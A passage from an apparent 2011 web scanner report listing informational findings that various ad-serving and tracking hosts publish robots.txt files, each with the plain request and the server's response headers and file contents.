User-agent: *
Disallow: /
24.12. http://adreq.bizographics.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adreq.bizographics.com
Path:   /i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adreq.bizographics.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:25:41 GMT
Expires: Sat, 17 Sep 2011 16:25:40 GMT
Last-Modified: Mon, 20 Dec 2010 18:45:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
24.13. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Mon, 19 Sep 2011 16:45:17 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.14. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 21:28:46 GMT
ETag: "30b0409-1a-4ac88dcc0df80"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 16:44:05 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /
24.15. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310680540000"
Last-Modified: Thu, 14 Jul 2011 21:55:40 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 16:26:34 GMT
Connection: close

User-agent: *
Disallow: /
24.16. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:20 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
24.17. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertising.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:43:56 GMT
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.18. http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/jquery/1.5.2/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sat, 17 Sep 2011 16:35:55 GMT
Expires: Wed, 14 Sep 2011 07:39:23 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=0
Age: 0

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.19. http://amch.questionmarket.com/dt/s/28067/0.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /dt/s/28067/0.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:28 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=931
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
24.20. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:11 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Wed, 14 Sep 2011 18:32:19 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Sun, 18 Sep 2011 16:34:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.21. http://api.zap2it.com/tvlistings/zcConnector.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.zap2it.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 15 Aug 2008 19:05:50 GMT
ETag: "13d8bd-19-4f517f80"
ntCoent-Length: 25
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=10800
Expires: Sat, 17 Sep 2011 19:23:30 GMT
Date: Sat, 17 Sep 2011 16:23:30 GMT
Content-Length: 25
Connection: close

User-agent: *
Disallow: /
24.22. http://as.serving-sys.com/OptOut/nai_optout_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout_results.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.serving-sys.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 19 Aug 2010 19:43:18 GMT
Accept-Ranges: bytes
ETag: "08f8bc5d63fcb1:74654"
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8

User-agent: *
Disallow: /
24.23. http://as1.suitesmart.com/102386/G14531.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /102386/G14531.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e36-1a-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /
24.24. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 22 Jul 2011 17:49:40 GMT
Accept-Ranges: bytes
ETag: "012e9ba9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:29:19 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
24.25. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Date: Sat, 17 Sep 2011 16:23:09 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /
24.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /
24.27. http://c.brightcove.com/services/viewer/federated_f9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 09 Sep 2011 02:01:13 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: text/plain
Content-Length: 64
Date: Sat, 17 Sep 2011 16:38:02 GMT
Connection: keep-alive
Server:

User-agent: *
Disallow: /
Allow: /services/viewer/federated_f9*
24.28. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sat, 17 Sep 2011 16:37:33 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
24.29. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/jquery.fancybox.1.3.4.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.manilla.com
Path:   /wp-content/themes/manilla-1.2/css/jquery.fancybox.1.3.4.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn1.manilla.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 16:35:12 GMT
Content-Type: text/plain
Connection: close
Content-Length: 427
Last-Modified: Mon, 06 Jun 2011 19:49:12 GMT
X-Cache: HIT
Accept-Ranges: bytes

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...
24.30. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:13 GMT
Server: PWS/1.7.3.6
X-Px: ht-d sea-ag1-n11.panthercdn.com
ETag: "737a3-17a-4aad025fb7a80"
Cache-Control: max-age=604800
Expires: Tue, 20 Sep 2011 06:46:11 GMT
Age: 380702
Content-Length: 378
Content-Type: text/plain
Last-Modified: Thu, 18 Aug 2011 23:41:14 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
24.31. http://cim.meebo.com/cim  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cim

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:34:34 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/
24.32. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:25:03 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
24.33. http://cm.npc-hearst.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.npc-hearst.overture.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
24.34. http://dc.kaboodle.com/b/ss/kaboodlecom/1/H.2-pdv-2/s98178625190630  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dc.kaboodle.com
Path:   /b/ss/kaboodlecom/1/H.2-pdv-2/s98178625190630

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dc.kaboodle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:00 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "30919a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www393
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.35. http://dis.criteo.com/dis/optoutstatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/optoutstatus.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:43:37 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
24.36. http://domdex.com/nai_optout_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /nai_optout_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: domdex.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Apr 2011 18:47:36 GMT
ETag: "1048c9b-fd-4a1722cc08200"
Accept-Ranges: bytes
Content-Length: 253
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/plain; charset=UTF-8

# Domdex Robots Rules
# Last update: 20091109 114151 - esammer

User-Agent: *
Disallow: /c?*$
Disallow: /f?*$
Disallow: /g?*$
Disallow: /i$
Disallow: /l?*$
Disallow: /m?*$
Disallow: /o?*$
Disallow: /r
...[SNIP]...
24.37. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 16:23:48 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
24.38. http://ellegirl.elle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ellegirl.elle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Status: 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 16:31:18 GMT
Content-Length: 5932
Connection: close

# This virtual robots.txt file was created by the PC Robots.txt WordPress plugin.
# For more info visit: http://petercoughlin.com/robotstxt-wordpress-plugin/

User-agent: Alexibot
Disallow: /

User
...[SNIP]...
24.39. http://events.adchemy.com/visitor/auuid/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.adchemy.com
Path:   /visitor/auuid/nai-status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.adchemy.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1309997551000"
Last-Modified: Thu, 07 Jul 2011 00:12:31 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 16:44:09 GMT
_onnection: keep-alive
Connection: close

User-agent: *
Disallow: /
24.40. http://events.seattlepi.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.seattlepi.com
Path:   /partner_json/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.seattlepi.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:26:42 GMT
Content-Type: text/plain; charset=utf-8
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 4
ETag: "206e6bfac5f98c1f3ebac4463eaa329a"
Cache-Control: must-revalidate, private, max-age=0
Content-Length: 579
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYjM2YTYxZTE5NTE0YWU5MjU3NjQzY2FhY2VhMzZkMDIiDWxvY2F0aW9uew0iCWNpdHkiElNhbiBGcmFuY2lzY28iC3JhZGl1c2lQIg1sYXRpdHVkZWYaMzcuNzY4MzAwMDAwMDAwMDA0AMInIhNkaXNwbGF5X3N0cmluZyIWU2FuIEZyYW5jaXNjbywgQ0EiDXRpbWV6b25lIg9VUy9QYWNpZmljIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy0xMjIuNDI0MDAwMDAwMDAwMDEAYEIiCnN0YXRlIgdDQQ%3D%3D--c8c920cca6122e241d47960a85b70f30f2340cea; path=/; expires=Sat, 17-Dec-2011 16:26:42 GMT; HttpOnly
X-Cache: MISS from squid1.admin.zvents.com
X-Cache-Lookup: MISS from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: keep-alive

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...
24.41. http://events.stamfordadvocate.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.stamfordadvocate.com
Path:   /partner_json/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.stamfordadvocate.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:09 GMT
Content-Type: text/plain; charset=utf-8
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 3
ETag: "9e2e2e6a51d6642a9f58846700910349"
Cache-Control: must-revalidate, private, max-age=0
Content-Length: 586
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYTUzMDg1NDlkMDQzYjRmNzc1MTczMmY3MTU1NzhjYjMiDWxvY2F0aW9uew0iCWNpdHkiElNhbiBGcmFuY2lzY28iC3JhZGl1c2lQIg1sYXRpdHVkZWYaMzcuNzY4MzAwMDAwMDAwMDA0AMInIhNkaXNwbGF5X3N0cmluZyIWU2FuIEZyYW5jaXNjbywgQ0EiDXRpbWV6b25lIg9VUy9QYWNpZmljIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy0xMjIuNDI0MDAwMDAwMDAwMDEAYEIiCnN0YXRlIgdDQQ%3D%3D--58983d156286919ff02ec05b27fd647d3e398e78; path=/; expires=Sat, 17-Dec-2011 16:23:09 GMT; HttpOnly
X-Cache: MISS from squid1.admin.zvents.com
X-Cache-Lookup: MISS from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: keep-alive

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...
24.42. http://fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fetchback.com
Path:   /serve/fb/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 18:05:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Sat, 17 Sep 2011 18:05:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...
24.43. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:35:59 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
24.44. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:25:14 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
24.45. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 02:53:23 GMT
Expires: Sun, 18 Sep 2011 02:53:23 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 49372

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
24.46. http://hearst.112.2o7.net/b/ss/hearstconnecticutglobal,hearstctadvocate/1/H.17/s95699573238380  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.112.2o7.net
Path:   /b/ss/hearstconnecticutglobal,hearstctadvocate/1/H.17/s95699573238380

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hearst.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:06 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3e055-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www427
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.47. http://hearst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hearst.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:31 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 16 Sep 2009 00:10:27 GMT
ETag: "140fa-29-b9dee2c0"
Accept-Ranges: bytes
Content-Length: 41
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /admin

24.48. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /b/ss/hmagglobal/1/H.22.1--NS/0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hearstmagazines.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:17 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "f016f-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www664
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.49. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: hfm.checkm8.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
ETag: "1315710718"
Last-Modified: Sun, 11-Sep-2011 03:11:58 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 28
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /
24.50. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.pulsemgr.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 05 Dec 2009 01:17:22 GMT
ETag: "5141b6-46-479f0fc7cec80"
Accept-Ranges: bytes
Content-Length: 70
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

# All robots are discouraged from entering.
User-agent: *
Disallow: /
24.51. http://internetmarketing.localedge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetmarketing.localedge.com
Path:   /

Issue detail

